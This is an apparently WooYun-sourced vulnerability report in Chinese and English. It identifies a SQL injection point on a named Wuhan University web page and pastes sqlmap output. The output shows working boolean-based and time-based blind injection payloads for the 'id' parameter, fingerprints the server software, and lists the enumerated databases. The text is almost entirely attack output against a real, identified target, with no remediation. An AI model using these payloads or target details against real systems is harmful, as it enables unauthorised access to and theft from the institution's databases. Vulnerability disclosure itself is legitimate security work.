WooYun.org

注入点：
http://wbm.whu.edu.cn/jcnr.php?mid=18&sid=9&id=958&tag=2
对参数id过滤不严，导致注入
请出sqlmap
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection points with a total of 76 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: mid=18&sid=9&id=958' AND 4586=4586 AND 'qGqp'='qGqp&tag=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: mid=18&sid=9&id=958' AND SLEEP(5) AND 'CHcP'='CHcP&tag=2
---
[11:05:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] mysql
[*] sizz_jcyxy